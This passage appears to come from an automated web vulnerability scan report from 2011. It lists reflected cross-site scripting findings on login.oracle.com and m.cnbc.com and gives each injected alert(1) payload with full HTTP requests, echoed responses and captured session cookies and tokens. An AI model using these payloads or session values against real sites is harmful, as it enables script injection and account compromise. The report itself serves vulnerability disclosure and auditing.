Cookie: p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315342940933; gpv_p24=no%20value; gpw_e24=no%20value; OAM_REQ=VERSION_4~NxywdvpcawCyMkTM4G71qJsOq72hZVWrUNC3MjhZV9f3dtJf5aL3%2flDPZgqxy71LbJwEeSlEW%2bymPmYi5xnQd1VhYNUy5BAaQuWYV1QPtKgkHgViQXuu26%2fj9P%2bw7wamSRLoSY38UWPAZZDVHEosIjfK91K4L24lW4XlijkOrHkWMnkThMoCKL%2bm%2fkypFHNQZbPrecqEbxIQ%2fmL1U5EjmghHZqmMKsGwfiolkoWQOZxYTitVababmv1AA2pygpRMHDHB3W0UuNa9IPK%2bWkEj7AzlwgJ%2fsOwSy6GgL4C6l6NBQqxbGALlu6wLGhs5CKMzrVnQuA9NYhkBoYNMq%2bCeiIvgzIykEQVBwnmmKyvVvDqW8dGr%2fTLu5ygIeagS0vuoz7CbOcyEcz27f8vx5%2fqclvJSD7mbtCvuMPbprZKgdGRSci3Z0qQF4Jkyj7YVT2LV008x7AIUy3QkD0rVEoH2xVeMEOUn7VAou3g28%2b%2bOUB3OZroMTKz273KYFOQk3bQBOTUoFLCR%2bQyOlwxMhhIJ46nIPIAn%2fcQ5NZtupalbBJ7rQNdrYpyvQGz%2bdftIr%2ff31bi1Diah8geTQiyN4%2fZ3KcMqlP9TnOuY5hEGmm4wObcg5WglrQVYV7isRF6AWRkd%2bk1kEROGepai8RjtcAegR%2b5Z%2bvUec4r7a%2b75gZc48dgS%2faR8ruh9CTlAwpKcFob2kF%2bHchzeWKHKjkNcAWhSbGFjrK4swdSEankx6biqm5UVJCpSmc%2fAq%2f1fgZR9sjRHHVSxrgB8EnObY98hf1BCukBz8mQps1PektbRn%2fALeHk%2fS9pVnjKwJFaXsNxsZt7TeEYc%2b71Dnk%2fz8YCzpWeR%2f%2bPl8unuOYUH1q44XoUMeLi1%2bADiVqRneB63%2ftWzOWBp50u1N%2bTy1Kxey3dC%2fdoECGY5XNp5zCsHkUZul5sxXdCUW8lNpPzmarHhun73cOKwJBV7ogKTADKqN7ertSGyqCCjzSMI40kgozmLHU2oD9JDPg28mWXowW1qliMYnh%2ffjkD6OqiHp3Y%2fzNYwnBP7Zh%2buj2%2fyGD%2fPaFWIi6cQrOgRdNlcb0Xc%2fl97NrLc8abdD%2f2un8kDJBUiE8023fM0yFwVHx6uFPqFC%2b%2fngCymDqp1UfTNFD5jCD6p7puTqmmLhUDn6xfgKkZhyCMLrpj26EuwcS7RSm7%2fS%2bkrjH5E3lHwAy7ss%2f4F2fNwASHfwHnFJSGkvYhLj3AL5tPNeNBKhhv%2bn4YDvdI65VI%2f985I9wzT5mDJ1xu6Z4lWDWiA5b8LGOn1dLaUvEN64D5Z53%2bY53LwfiQwVsaYFhOkJuG8Xp1nQWOuaPahq6jJTJgjFzJwBnE%2fGjHnoymO2FRpu48mOQooisWYBNUBz8Z8XWYk59Pmpr2QbX2lyJwghsEhfdMEBFfE4FIJ0sX93gHzRH9UUOwvWTsKqVZu82K6yOUAOUr7etnP4vYyxqUss0NXMcoXF7HQftpSaRbwpUtZ1B8F3feEjs9tBu45afXQ%2f%2fSOWltFnIIGzJzbE%2fvCkj9em8VBWnmiD%2bV3rKjz97EImPLbVavhHui4v98zrLQqvLqqytf%2fVCeOVu1MWD3zkUoC%2boXnBk%2bQw92SwOYQPwwouiBG%2b28Wl1QaypOncFf99oGzCgdaVMoKy7I1ClMk7jlTETTOWm09pk1afrjvV4tOZQ%2bz59ytqFim1FRiwWoC6yqRWJo%3d; 
BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:18:57 GMT
Set-Cookie: OAM_REQ=VERSION_4~EsY9351n%2bL75TyUMNl8LPW73mzYZPslZUdvAtbyf8I%2fsrrJG5gzSLEfs2wZO0aEEm%2f3JWzNmG5jKe1aJAnCDP45JBWjpLTnQMtc34bOV7V2iNl%2bMrXJxYSb8XBcWr%2foOxZLH36duZJi1Fm4481Kymq8RinvKKwEhGJLJOFo2%2fB0wEjM60VcUlsN%2fKUtXh4CgEjVg7oZzDAHzJEz0lBT0G0mYFIZUWbAwWFsi8vdddXkh3cGZotSc7eeh%2boqhYbRAAiGh1v7c4RTA%2fxqbZqQ9pHeY3qYge8IjHXdqcNQnfDNGI0eFb4QBv1JTF2%2fKIjJfwvgdn6nr1SICR86ih13Yu1t2KpaAAYmeonATsz0XlE%2bU6kXqcKnt0dInUlPhrsLbWee5NP9%2f19mt6gV9zPvaM7hDwtQuWCcNU4htv8gXHjTQBxsA%2b2SvZtvr0kIZkXlmkGg%2fb%2foAVB9D0pFXD6Ggh9cdooUvzY4viPGsxAfoI%2f591d7glZBOLkgUvS48uK6RRu8NbzYWHtpXaa%2bYmBTshVsE13YQpK4ObNWjS72Y5vFAmdYi7HisthZdJD%2bHKoa%2bOdwh7tD%2fYIf3aJj78SR9ufKcbtbzLYE6SRCixeTUyhCUnGsbtdI31KyQLmKtrx2kgJDwqmaIim5jLj099PmJF0gU0RYjYzuUbYwR45faQYsxxEoQ7mnGRwfyy5s4fmWlSX9cHmRyX8MW2EPSMraeHUpS33ko2QOwyIrkrEHFOjXrYfd%2b2yVFLS9IXJUiBwGSoRAF1LeDE2dHSjlLkLsSWTwm7oTRF98APeVSfu2R1J4uop1cWyJRFoJExHTDPjtafiU719gvppS0djK92osAheYsmsO4A9K3cLOBuVRPQJluOSLGsSFMpr%2fbqQYp6y8T0dAMi3Ds%2f9%2foCumvkBAgtzYNYsKhiKGbLTi0rzOD4e0jK0hoVDZrNvRpgKBl%2fvq0kUxndQ5un4EUFmbJp%2fE%2b%2bnjaGwCuXkMTK%2buWsVLQyiaxJS4EiCg42C4vv1PHJL1C9jHFtkkgU1fdTb6Yx6Wj2uU%2fByUOD94IPUfC%2bNe0cX%2fHcutt3ZxhT%2bkDMxUxcjIDBZv%2bjbISVrlcqGQ4ntNi2PSo9U2Gqrt1AeNkQ3K%2bzddfzhCG1M6bw8RoPiwzmjq6cLwQnbDKRHZqcJjGfW6FmionsHL4QaXJXEnlW88m9xVGQSZ8pIn1nBQJU26i68WyubXHx7jGY2yvR2Ru5kgn8PI0iaAsSWrmDsmvWI5v6Kf4i7P5Nm8CFY9TxPTz849yBwTijE5fAsm7L4F8CLSmt89c98WJd6N%2bEFyMapg9wfYYko62Zd7HhEbEhmauhmH7HnDCWwkjxJy%2fKRi2RxzUptRMTQ%2bgSnCV5RACLDybfDacI5duyXUFjDqxPyka7YQMifwTXMqc3I7yEM18nPI3Y3g6Pn4vS9bIKfmfbkDjkPf1Lu%2fz%2bNBXWNYccZhpG%2bndCyVP9CMRwLXGXxi85ZQvMKNEb8UzlaokmVmoMOXLkDYZyao7nbTJz7HzACTg%2bJOPN6ODWcwIr%2bbaGqTdMQQqLBa1KUkkVHx33BbHmyWSx6md0HukHmNASFcrFOuUkzd1RgurnTT7F%2bWo7huPmYTZ5pkYL%2fxHh5nXWaUsT%2f%2bHJ3LgdFdRvSgHzSSKQXl2K5HA%2bafmHtpxAgjYIr%2f12UctTk8YSf1XNIlrJjw3oLycqG3pChKZPr1DE%2bJjgVSTtL8VOC5tisuN5sEc%2fl3lM1yEGpm4LlDAWVY0D4v03%2brC9QMFtOF2qj%2bg0QZ2QxGggBLrs9B%2bf5L2cszHFtNSmEPvb0x6UIkFqgSfaz3bAKqM6VzRhBOrRC9lTl6C1unvfpSlrjT5At
d7Wplo72DP7htU9fVHm50C9vn8vTujqBCpXdmpzbEbwHbDMvwGy5GJOgva64ea0ayQeOm1Rr1jzwXX9BMO8dpefvXa5fo6IpgF%2bDE5jAf5JfBDwNyAFF51SwB5L6xBQndB1cLNqYJqdOBQUg%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zYGTK6uHK6EVADUS1EHWFB01tbde
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:18:57 GMT; path=/
Content-Length: 2709

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
</script>d6751adef14af5029c1951<script>alert(1)</script>81611ea9517">
...[SNIP]...

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The value of the request_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c7b4"><script>alert(1)</script>d6751adef14af5029 was submitted in the request_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /oam/server/sso/auth_cred_submit?v=v1.4&request_id=-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%252bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%252flJzu7m9%252f1lXhQDZkvLYt%252bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%252fwXpbFtlj2kGJ%252fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%252f%252fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%252fDEO%252fCYluZce8U%252bGGbT0K9o1sJA4XjxLL8%252f8AfNO%252fwgLKh%252bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%252f1ao%252btvjJSu1MtNbwWjD8UmI6Bp%252bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%252fcJMIXtw%252fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%252b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%252bbfWK8%252f54EneCznHCw32Dn13%252f%252b2dACr4TQeKM9Oua%252f%252bwnu%252bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%252bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%252fPItNWUsY%252bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%252fk2aJmyp8Ow%252fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%252bEXUOC%252f6G2f3htenFJenmnMekNtGu%252fXfaFZL8GjhhVe5W2JhMe%252bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%252fvB%252bACTy9lrXfSV77QwN%252buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%252bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%252fD4y50BLNBJCH%252b8a6B8NLIOqiOoU%252fCEYSRHDnFZv5HTMnTiqJZ%252bljcmdaGu3BPZkHEknjwJ%252frdJN%252fF4KZDIxyB3z0Gc63SxU5%252bTOVa2gKg9LLQNB2%252bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%252fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%252f010hrRBg%252bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%252f5w%253d%253d&site2p
storetoken=v1.2%7E15AB5291%7ECA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682&locale=&ssousername=xss&password=xss HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNt
Gu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:17:10 GMT
Set-Cookie: OAM_REQ=VERSION_4~kFAC1XaMEpaJ8SJOUrf%2fWt2Eo7fTd6kx5GkSobJXbTa9ofaZvm8X1pAbDFt2MEuS3MePYuT%2fmFC6jCqPOKsg5EGn8%2f5siYPls53KS2IfE5cAKYqV2nwLNlXuhTnUYD7%2bqgU6DNG1zrFdSZwFZvxFyciZDIbbbnhH9oRg0ceM1muAJi1B5fV43af5UynsM4YyGgbbfAlBREllNguLNsO9pgPSAgLfyd4J8jO1mR8hmBly2Qe1K8Tieg3%2fXbAEmyHqq8mBg8gmx4%2f7JOAbCcxazh%2brWrBI91l82SUGo8jfrb6mv7Am3WPBKU1mn48kN%2bqo2VJzi7%2fsLFGYYAnXWBwN7TjAFSkQzufA1dxnEwxBoVrJBif6NqyI5sc73QqvYIVs5s2uSoVB7OG4vusTIrSC3M1J%2bXw34SlfE6bwoWG7hXLJu%2fxGFD7tU7q6cnoKfMLgmk3RVX0WkuFW3l%2bNIRESpgSboEw1l80kwLoK5SB9TZhJ9U9B1LLNAKsjfaXmnYo7qK%2f9ATN1N7IxQht%2fXXmrWmsgSPIJWSCwMMYOqQ2mKce34pt0uSUhsDaGJrlfznnWIuParzsU26PBHAKlJlGGCAFsC1XiJQ9pygZGlYY7vWScqX37bn%2b%2fhLbSwbUQQu0y5z98Ulo%2b5IFLEPHYoOYJaWY4IuX%2fO0vKkiR8QgbH4bg%2fM6onyO9R%2f%2fdVrHGJJrJ%2fKrj00c%2fla7ybboS2B2PSyDf2BWQfi9EP5CMv8xmSwUVWpEf8YztPrfG6JBJt6sFIFZXLYyL9c3Lgh0Js63KCgdgTX5zatHuB9iQ%2b9vr%2bSHXkhdlkcTjBT3rKbEsEpxSgv2lavD2cqY8YSS2jwLZEvEcR1er6uRFGqya1OarXmPCdtpVogeosgxLQ%2bUAptgSI2sbJyRV%2f8fFlCu3WRB0otUeqy4dOida3y5yQ9mxxFfQar9jsGGvnEeX%2bhhsHo2PXtKnmfuGfUwyR6C8THvE4579RVsK84IEbwdym4Y0jvuQSFW81brTJ2JzejPjySRJDjAtdxl%2faO6SSI1B4FGvXS9lvaTvmPKCntQ%2bjbtwuN1kY7tjw9qplEyyxRJcA3ssOLdIvA4zwuVU0HwhaV4geRx7Uf94lsiEExtzGV2WPn9Y%2bc3X37HfRS3VshKqfNvksWF%2bbnL9fJRo3Z6V9Ho8BR3NbO%2bw%2fb4SPOP1grldEk6sBfPdD9knTg%2fTP1uM2ut2wR7doZ9YcUJZZ16%2f9trfZqHMjEX%2fiaKguZr46uYqTab2AK6dpfBmLNhNogN%2fPjJDVvbSwgJVDCXWY%2fPHLL4myDtby3Eyw7NQPgCUCK9s4T3NIUumy4Cnja86gM49x2Qa98H5TvFvv%2bzTMtB5yKYmSJfnpGViX0DZbiyV1E%2fZDQMP4btXxU3PTgqGbXx8ZYi3s61ou3twd3XAy8ulz4Z4BfaU7A%2fL2aB%2fSJzq8R%2f%2bdvQoskKYNJ39BX8ZIGoecc3vJTrnbVRFebOhc5P93wpRnhOeMughVxlUGmxnSx7ZiuirRQudGH4E8O7spt2Aaf5abIr62aflBa7yvQT%2bph5eVgyNyrS4P1OF%2f9oiDfhf8bb647N0kyr3JPyNDScpyqObS9CMjaVJUkcWKS7uakG8Vwsc1ndOVxHQRr8H1rW3SC3g3EfEzukgorgSTEWVMVk1Jm%2fUa2XDd89JKZHQJ3GMb5oZeTSn%2fR%2fFnUJr8OjZcE6BpcWS73EZN3WPDKjFkm8NVwKJGRXNcAwTWsca3SJEOOA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXqFk6uHK6EVADUS1EHWFB01tasY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:17:10 GMT; path=/
Content-Length: 2386

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
<input type="hidden" name="request_id" value="-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029">
...[SNIP]...

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c45'-alert(1)-'fbc41ead6d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?62c45'-alert(1)-'fbc41ead6d9=1 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:12 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 13408
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/?62c45'-alert(1)-'fbc41ead6d9=1&refresh=true\'',300000)</script>
...[SNIP]...

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e284c'-alert(1)-'58c7eb2456a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoe284c'-alert(1)-'58c7eb2456a HTTP/1.1
Host: m.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cc=true; s_nr=1315339276909; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/memberCenter.do%2526ot%253DA; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2003|Q_2001|Q_1997|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_320|Q_316; __qca=P0-1990433296-1315339228713; SESS93eea98f293ea8fd633599e480cddfdc=7hpvssf67odmb1il9onl52ot53; s_vi=[CS]v1|27331BA1051D06AC-4000010700020B59[CE]; rnmd_test=x; rnmd_uuid=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:08:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Content-Type: text/html; charset=utf-8
Via: 1.1 C aicache6
Content-Length: 4010
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 15:08:30 GMT

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/favicon.icoe284c'-alert(1)-'58c7eb2456a?refresh=true\'',300000)</script>
...[SNIP]...

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e92'-alert(1)-'f261e685920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytestc3e92'-alert(1)-'f261e685920/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4643
X-Aicache-OS: 64.210.193.251:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytestc3e92'-alert(1)-'f261e685920/ipecho.php?refresh=true\'',300000)</script>
...[SNIP]...

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.cnbc.com
Path:   /mytest/ipecho.php

Issue detail

